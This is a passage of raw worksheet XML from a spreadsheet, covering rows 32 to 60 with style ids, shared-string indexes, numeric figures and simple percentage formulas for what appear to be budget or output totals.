      </c>
      <c r="J32" s="194"/>
      <c r="K32" s="194"/>
      <c r="L32" s="361">
        <v>1021478</v>
      </c>
      <c r="M32" s="365">
        <v>60437.506</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>120.875012</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209"/>
      <c r="S32" s="209"/>
      <c r="T32" s="363">
        <v>0</v>
      </c>
      <c r="U32" s="209"/>
      <c r="V32" s="209"/>
      <c r="W32" s="363">
        <v>4.11676646706587e-11</v>
      </c>
      <c r="X32" s="209"/>
      <c r="Y32" s="209"/>
      <c r="Z32" s="363">
        <v>3.3e-9</v>
      </c>
    </row>
    <row r="33" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194"/>
      <c r="H33" s="194"/>
      <c r="I33" s="361">
        <v>0</v>
      </c>
      <c r="J33" s="194"/>
      <c r="K33" s="194"/>
      <c r="L33" s="361">
        <v>0</v>
      </c>
      <c r="M33" s="365">
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209"/>
      <c r="S33" s="209"/>
      <c r="T33" s="363">
        <v>19.77</v>
      </c>
      <c r="U33" s="209"/>
      <c r="V33" s="209"/>
      <c r="W33" s="363">
        <v>63.1215069860293</v>
      </c>
      <c r="X33" s="209"/>
      <c r="Y33" s="209"/>
      <c r="Z33" s="363">
        <v>5059.82000000011</v>
      </c>
    </row>
    <row r="34" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194"/>
      <c r="H34" s="194"/>
      <c r="I34" s="361">
        <v>0</v>
      </c>
      <c r="J34" s="194"/>
      <c r="K34" s="194"/>
      <c r="L34" s="361">
        <v>467202.93</v>
      </c>
      <c r="M34" s="365">
        <v>0</v>
      </c>
      <c r="N34" s="195"/>
      <c r="O34" s="222"/>
      <c r="P34" s="223"/>
      <c r="Q34" s="224"/>
      <c r="R34" s="209"/>
      <c r="S34" s="209"/>
      <c r="T34" s="209"/>
      <c r="U34" s="209"/>
      <c r="V34" s="209"/>
      <c r="W34" s="209"/>
      <c r="X34" s="209"/>
      <c r="Y34" s="209"/>
      <c r="Z34" s="209"/>
    </row>
    <row r="35" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A35" s="191"/>
      <c r="B35" s="193"/>
      <c r="C35" s="193"/>
      <c r="D35" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E35" s="194"/>
      <c r="F35" s="194"/>
      <c r="G35" s="194"/>
      <c r="H35" s="194"/>
      <c r="I35" s="361">
        <v>0</v>
      </c>
      <c r="J35" s="194"/>
      <c r="K35" s="194"/>
      <c r="L35" s="361">
        <v>0</v>
      </c>
      <c r="M35" s="365"/>
      <c r="N35" s="195"/>
      <c r="O35" s="222"/>
      <c r="P35" s="193"/>
      <c r="Q35" s="193"/>
      <c r="R35" s="227"/>
      <c r="S35" s="227"/>
      <c r="T35" s="227"/>
      <c r="U35" s="227"/>
      <c r="V35" s="227"/>
      <c r="W35" s="227"/>
      <c r="X35" s="227"/>
      <c r="Y35" s="227"/>
      <c r="Z35" s="227"/>
    </row>
    <row r="36" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A36" s="191"/>
      <c r="B36" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C36" s="193"/>
      <c r="D36" s="193"/>
      <c r="E36" s="194"/>
      <c r="F36" s="194"/>
      <c r="G36" s="194"/>
      <c r="H36" s="194"/>
      <c r="I36" s="194">
        <v>0</v>
      </c>
      <c r="J36" s="194"/>
      <c r="K36" s="194"/>
      <c r="L36" s="194">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s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A37" s="191"/>
      <c r="B37" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C37" s="193"/>
      <c r="D37" s="193"/>
      <c r="E37" s="194">
        <v>200000</v>
      </c>
      <c r="F37" s="194"/>
      <c r="G37" s="194"/>
      <c r="H37" s="194"/>
      <c r="I37" s="194">
        <v>0</v>
      </c>
      <c r="J37" s="194"/>
      <c r="K37" s="194"/>
      <c r="L37" s="194">
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231"/>
      <c r="S37" s="232"/>
      <c r="T37" s="233"/>
      <c r="U37" s="234"/>
      <c r="V37" s="366">
        <v>0</v>
      </c>
      <c r="W37" s="235"/>
      <c r="X37" s="234"/>
      <c r="Y37" s="367">
        <v>0</v>
      </c>
      <c r="Z37" s="235"/>
    </row>
    <row r="38" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194"/>
      <c r="I38" s="194">
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194"/>
      <c r="L38" s="194">
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237"/>
      <c r="S38" s="235"/>
      <c r="T38" s="235"/>
      <c r="U38" s="234"/>
      <c r="V38" s="366">
        <v>259139.72</v>
      </c>
      <c r="W38" s="235"/>
      <c r="X38" s="234"/>
      <c r="Y38" s="367">
        <v>256107</v>
      </c>
      <c r="Z38" s="235"/>
    </row>
    <row r="39" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194"/>
      <c r="I39" s="194">
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194"/>
      <c r="L39" s="194">
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231"/>
      <c r="S39" s="232"/>
      <c r="T39" s="238"/>
      <c r="U39" s="234"/>
      <c r="V39" s="366">
        <v>78813.599</v>
      </c>
      <c r="W39" s="235"/>
      <c r="X39" s="234"/>
      <c r="Y39" s="367">
        <v>78759</v>
      </c>
      <c r="Z39" s="238"/>
    </row>
    <row r="40" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194"/>
      <c r="I40" s="194">
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194"/>
      <c r="L40" s="194">
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239"/>
      <c r="S40" s="240"/>
      <c r="T40" s="238"/>
      <c r="U40" s="234"/>
      <c r="V40" s="366">
        <v>0</v>
      </c>
      <c r="W40" s="235"/>
      <c r="X40" s="234"/>
      <c r="Y40" s="367">
        <v>0</v>
      </c>
      <c r="Z40" s="238"/>
    </row>
    <row r="41" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>23000</v>
      </c>
      <c r="F41" s="194"/>
      <c r="G41" s="225"/>
      <c r="H41" s="194"/>
      <c r="I41" s="361">
        <v>124976</v>
      </c>
      <c r="J41" s="194"/>
      <c r="K41" s="194"/>
      <c r="L41" s="361">
        <v>121393.54</v>
      </c>
      <c r="M41" s="361">
        <v>26129.76</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>87.0992</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239"/>
      <c r="S41" s="240"/>
      <c r="T41" s="238"/>
      <c r="U41" s="234"/>
      <c r="V41" s="366">
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235"/>
      <c r="X41" s="234"/>
      <c r="Y41" s="367">
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238"/>
    </row>
    <row r="42" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194"/>
      <c r="G42" s="225"/>
      <c r="H42" s="194"/>
      <c r="I42" s="361">
        <v>0</v>
      </c>
      <c r="J42" s="194"/>
      <c r="K42" s="194"/>
      <c r="L42" s="361">
        <v>0</v>
      </c>
      <c r="M42" s="361">
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237"/>
      <c r="S42" s="238"/>
      <c r="T42" s="238"/>
      <c r="U42" s="234"/>
      <c r="V42" s="367">
        <v>207586.97</v>
      </c>
      <c r="W42" s="235"/>
      <c r="X42" s="234"/>
      <c r="Y42" s="367">
        <v>202471</v>
      </c>
      <c r="Z42" s="238"/>
    </row>
    <row r="43" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194"/>
      <c r="G43" s="225"/>
      <c r="H43" s="194"/>
      <c r="I43" s="361">
        <v>0</v>
      </c>
      <c r="J43" s="194"/>
      <c r="K43" s="194"/>
      <c r="L43" s="361">
        <v>0</v>
      </c>
      <c r="M43" s="361">
        <v>0</v>
      </c>
      <c r="N43" s="212"/>
      <c r="O43" s="200"/>
      <c r="P43" s="215"/>
      <c r="Q43" s="193" t="s">
        <v>281</v>
      </c>
      <c r="R43" s="241"/>
      <c r="S43" s="238"/>
      <c r="T43" s="238"/>
      <c r="U43" s="234"/>
      <c r="V43" s="367"/>
      <c r="W43" s="235"/>
      <c r="X43" s="234"/>
      <c r="Y43" s="367"/>
      <c r="Z43" s="238"/>
    </row>
    <row r="44" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A44" s="191"/>
      <c r="B44" s="193"/>
      <c r="C44" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D44" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E44" s="194"/>
      <c r="F44" s="194"/>
      <c r="G44" s="225"/>
      <c r="H44" s="194"/>
      <c r="I44" s="361">
        <v>128550.22</v>
      </c>
      <c r="J44" s="194"/>
      <c r="K44" s="194"/>
      <c r="L44" s="361">
        <v>0</v>
      </c>
      <c r="M44" s="361">
        <v>67362.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237"/>
      <c r="S44" s="238"/>
      <c r="T44" s="238"/>
      <c r="U44" s="234"/>
      <c r="V44" s="367">
        <v>64753.168</v>
      </c>
      <c r="W44" s="235"/>
      <c r="X44" s="234"/>
      <c r="Y44" s="367">
        <v>66410</v>
      </c>
      <c r="Z44" s="238"/>
    </row>
    <row r="45" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225"/>
      <c r="H45" s="194"/>
      <c r="I45" s="361">
        <v>0</v>
      </c>
      <c r="J45" s="225"/>
      <c r="K45" s="194"/>
      <c r="L45" s="361">
        <v>0</v>
      </c>
      <c r="M45" s="361"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237"/>
      <c r="S45" s="238"/>
      <c r="T45" s="238"/>
      <c r="U45" s="234"/>
      <c r="V45" s="367">
        <v>1.329</v>
      </c>
      <c r="W45" s="235"/>
      <c r="X45" s="234"/>
      <c r="Y45" s="367">
        <v>1.329</v>
      </c>
      <c r="Z45" s="238"/>
    </row>
    <row r="46" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194"/>
      <c r="I46" s="194">
        <v>0</v>
      </c>
      <c r="J46" s="194"/>
      <c r="K46" s="194"/>
      <c r="L46" s="194">
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237"/>
      <c r="S46" s="238"/>
      <c r="T46" s="238"/>
      <c r="U46" s="234"/>
      <c r="V46" s="366">
        <v>0</v>
      </c>
      <c r="W46" s="235"/>
      <c r="X46" s="234"/>
      <c r="Y46" s="367">
        <v>0</v>
      </c>
      <c r="Z46" s="238"/>
    </row>
    <row r="47" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>28000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194"/>
      <c r="I47" s="194">
        <v>0</v>
      </c>
      <c r="J47" s="194"/>
      <c r="K47" s="194"/>
      <c r="L47" s="194">
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237"/>
      <c r="S47" s="238"/>
      <c r="T47" s="238"/>
      <c r="U47" s="234"/>
      <c r="V47" s="366">
        <v>0</v>
      </c>
      <c r="W47" s="235"/>
      <c r="X47" s="234"/>
      <c r="Y47" s="367">
        <v>0</v>
      </c>
      <c r="Z47" s="238"/>
    </row>
    <row r="48" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194"/>
      <c r="I48" s="194">
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194"/>
      <c r="L48" s="194">
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237"/>
      <c r="S48" s="238"/>
      <c r="T48" s="238"/>
      <c r="U48" s="234"/>
      <c r="V48" s="366">
        <v>6026.53</v>
      </c>
      <c r="W48" s="235"/>
      <c r="X48" s="234"/>
      <c r="Y48" s="367">
        <v>0</v>
      </c>
      <c r="Z48" s="238"/>
    </row>
    <row r="49" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194"/>
      <c r="I49" s="194">
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194"/>
      <c r="L49" s="194">
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237"/>
      <c r="S49" s="238"/>
      <c r="T49" s="238"/>
      <c r="U49" s="234"/>
      <c r="V49" s="366">
        <v>179888.95</v>
      </c>
      <c r="W49" s="235"/>
      <c r="X49" s="234"/>
      <c r="Y49" s="367">
        <v>176530.34</v>
      </c>
      <c r="Z49" s="238"/>
    </row>
    <row r="50" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194"/>
      <c r="I50" s="194">
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194"/>
      <c r="L50" s="194">
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237"/>
      <c r="S50" s="238"/>
      <c r="T50" s="238"/>
      <c r="U50" s="234"/>
      <c r="V50" s="366">
        <v>0</v>
      </c>
      <c r="W50" s="235"/>
      <c r="X50" s="234"/>
      <c r="Y50" s="367">
        <v>0</v>
      </c>
      <c r="Z50" s="238"/>
    </row>
    <row r="51" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>171000</v>
      </c>
      <c r="F51" s="194"/>
      <c r="G51" s="225"/>
      <c r="H51" s="194"/>
      <c r="I51" s="361">
        <v>1376399</v>
      </c>
      <c r="J51" s="194"/>
      <c r="K51" s="194"/>
      <c r="L51" s="361">
        <v>1363123.931</v>
      </c>
      <c r="M51" s="361">
        <v>48852.6839999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>108.56152</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237"/>
      <c r="S51" s="238"/>
      <c r="T51" s="238"/>
      <c r="U51" s="234"/>
      <c r="V51" s="366">
        <v>62998.471</v>
      </c>
      <c r="W51" s="235"/>
      <c r="X51" s="234"/>
      <c r="Y51" s="367">
        <v>60616.237</v>
      </c>
      <c r="Z51" s="238"/>
    </row>
    <row r="52" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>118000</v>
      </c>
      <c r="F52" s="194"/>
      <c r="G52" s="225"/>
      <c r="H52" s="194"/>
      <c r="I52" s="361">
        <v>1383567.25</v>
      </c>
      <c r="J52" s="194"/>
      <c r="K52" s="194"/>
      <c r="L52" s="361">
        <v>1281694.2</v>
      </c>
      <c r="M52" s="361">
        <v>105111.00000005</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/65000*100</f>
        <v>161.709230769308</v>
      </c>
      <c r="O52" s="200"/>
      <c r="P52" s="244"/>
      <c r="Q52" s="193" t="s">
        <v>280</v>
      </c>
      <c r="R52" s="241"/>
      <c r="S52" s="233"/>
      <c r="T52" s="238"/>
      <c r="U52" s="234"/>
      <c r="V52" s="366"/>
      <c r="W52" s="235"/>
      <c r="X52" s="234"/>
      <c r="Y52" s="367"/>
      <c r="Z52" s="238"/>
    </row>
    <row r="53" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A53" s="191"/>
      <c r="B53" s="193"/>
      <c r="C53" s="193"/>
      <c r="D53" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E53" s="194"/>
      <c r="F53" s="194"/>
      <c r="G53" s="225"/>
      <c r="H53" s="194"/>
      <c r="I53" s="361">
        <v>0</v>
      </c>
      <c r="J53" s="194"/>
      <c r="K53" s="194"/>
      <c r="L53" s="361">
        <v>0</v>
      </c>
      <c r="M53" s="361">
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237"/>
      <c r="T53" s="237"/>
      <c r="U53" s="234"/>
      <c r="V53" s="366">
        <v>38334.427</v>
      </c>
      <c r="W53" s="237"/>
      <c r="X53" s="234"/>
      <c r="Y53" s="367">
        <v>39491</v>
      </c>
      <c r="Z53" s="237"/>
    </row>
    <row r="54" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225"/>
      <c r="H54" s="194"/>
      <c r="I54" s="361">
        <v>0</v>
      </c>
      <c r="J54" s="194"/>
      <c r="K54" s="194"/>
      <c r="L54" s="361">
        <v>211441.85</v>
      </c>
      <c r="M54" s="361">
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247"/>
      <c r="S54" s="247"/>
      <c r="T54" s="247"/>
      <c r="U54" s="234"/>
      <c r="V54" s="368">
        <v>0</v>
      </c>
      <c r="W54" s="249"/>
      <c r="X54" s="234"/>
      <c r="Y54" s="369">
        <v>0</v>
      </c>
      <c r="Z54" s="247"/>
    </row>
    <row r="55" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225"/>
      <c r="H55" s="194"/>
      <c r="I55" s="361">
        <v>0</v>
      </c>
      <c r="J55" s="225"/>
      <c r="K55" s="194"/>
      <c r="L55" s="361">
        <v>35435.65</v>
      </c>
      <c r="M55" s="361"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253"/>
      <c r="S55" s="253"/>
      <c r="T55" s="253"/>
      <c r="U55" s="254"/>
      <c r="V55" s="368">
        <v>0</v>
      </c>
      <c r="W55" s="256"/>
      <c r="X55" s="254"/>
      <c r="Y55" s="257">
        <v>0</v>
      </c>
      <c r="Z55" s="247"/>
    </row>
    <row r="56" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194"/>
      <c r="I56" s="194">
        <v>0</v>
      </c>
      <c r="J56" s="194"/>
      <c r="K56" s="194"/>
      <c r="L56" s="194">
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258"/>
      <c r="P56" s="259" t="s">
        <v>237</v>
      </c>
      <c r="Q56" s="260"/>
      <c r="R56" s="261"/>
      <c r="S56" s="261"/>
      <c r="T56" s="261"/>
      <c r="U56" s="261"/>
      <c r="V56" s="261"/>
      <c r="W56" s="261"/>
      <c r="X56" s="261"/>
      <c r="Y56" s="261"/>
      <c r="Z56" s="262"/>
    </row>
    <row r="57" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A57" s="191"/>
      <c r="B57" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C57" s="193"/>
      <c r="D57" s="193"/>
      <c r="E57" s="194">
        <v>177000</v>
      </c>
      <c r="F57" s="194"/>
      <c r="G57" s="225"/>
      <c r="H57" s="194"/>
      <c r="I57" s="194">
        <v>0</v>
      </c>
      <c r="J57" s="194"/>
      <c r="K57" s="194"/>
      <c r="L57" s="194">
        <v>0</v>
      </c>
      <c r="M57" s="194"/>
      <c r="N57" s="195"/>
      <c r="O57" s="263"/>
      <c r="P57" s="264"/>
      <c r="Q57" s="265"/>
      <c r="R57" s="266"/>
      <c r="S57" s="266"/>
      <c r="T57" s="266"/>
      <c r="U57" s="266"/>
      <c r="V57" s="266"/>
      <c r="W57" s="266"/>
      <c r="X57" s="266"/>
      <c r="Y57" s="266"/>
      <c r="Z57" s="267"/>
    </row>
    <row r="58" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A58" s="191"/>
      <c r="B58" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C58" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D58" s="193"/>
      <c r="E58" s="194"/>
      <c r="F58" s="194"/>
      <c r="G58" s="225"/>
      <c r="H58" s="194"/>
      <c r="I58" s="194">
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194"/>
      <c r="L58" s="194">
        <v>0</v>
      </c>
      <c r="M58" s="194"/>
      <c r="N58" s="195"/>
      <c r="O58" s="263"/>
      <c r="P58" s="264"/>
      <c r="Q58" s="268"/>
      <c r="R58" s="269"/>
      <c r="S58" s="269"/>
      <c r="T58" s="269"/>
      <c r="U58" s="269"/>
      <c r="V58" s="269"/>
      <c r="W58" s="269"/>
      <c r="X58" s="269"/>
      <c r="Y58" s="269"/>
      <c r="Z58" s="270"/>
    </row>
    <row r="59" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A59" s="191"/>
      <c r="B59" s="191"/>
      <c r="C59" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D59" s="193"/>
      <c r="E59" s="194"/>
      <c r="F59" s="194"/>
      <c r="G59" s="194"/>
      <c r="H59" s="194"/>
      <c r="I59" s="194">
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194"/>
      <c r="L59" s="194">
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>252</v>
      </c>
      <c r="Q59" s="271"/>
      <c r="R59" s="272"/>
      <c r="S59" s="272"/>
      <c r="T59" s="272"/>
      <c r="U59" s="272"/>
      <c r="V59" s="272"/>
      <c r="W59" s="272"/>
      <c r="X59" s="272"/>
      <c r="Y59" s="272"/>
      <c r="Z59" s="273"/>
    </row>
    <row r="60" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A60" s="191"/>
      <c r="B60" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C60" s="193"/>
      <c r="D60" s="193"/>
      <c r="E60" s="194"/>
      <c r="F60" s="194"/>
      <c r="G60" s="225"/>
      <c r="H60" s="194"/>
      <c r="I60" s="194">
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194"/>
      <c r="L60" s="194">
        <v>0</v>
      </c>
      <c r="M60" s="194"/>
      <c r="N60" s="195"/>
      <c r="O60" s="263"/>
      <c r="P60" s="264"/>
      <c r="Q60" s="265"/>
      <c r="R60" s="266"/>
